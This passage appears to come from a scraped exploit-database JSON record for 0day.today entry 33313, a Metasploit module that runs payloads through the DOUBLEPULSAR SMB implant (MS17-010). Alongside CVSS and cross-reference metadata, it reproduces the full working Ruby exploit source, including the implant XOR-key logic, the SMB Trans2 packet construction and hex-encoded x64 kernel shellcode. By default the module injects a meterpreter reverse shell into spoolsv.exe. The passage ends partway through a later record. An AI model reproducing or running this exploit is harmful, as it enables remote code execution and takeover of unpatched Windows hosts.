\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-15] #"}, "lastseen": "2021-09-14T22:19:49", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "fe43a3cf446519318094bf4043670ac2", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-15T22:29:31", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031", 
"EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-15T22:29:31", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-15T22:29:31", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 
'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-16] #"}, "lastseen": "2021-09-15T22:29:31", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f1b373011c7d5d5a7e070432a973ca07", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-16T22:32:51", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", 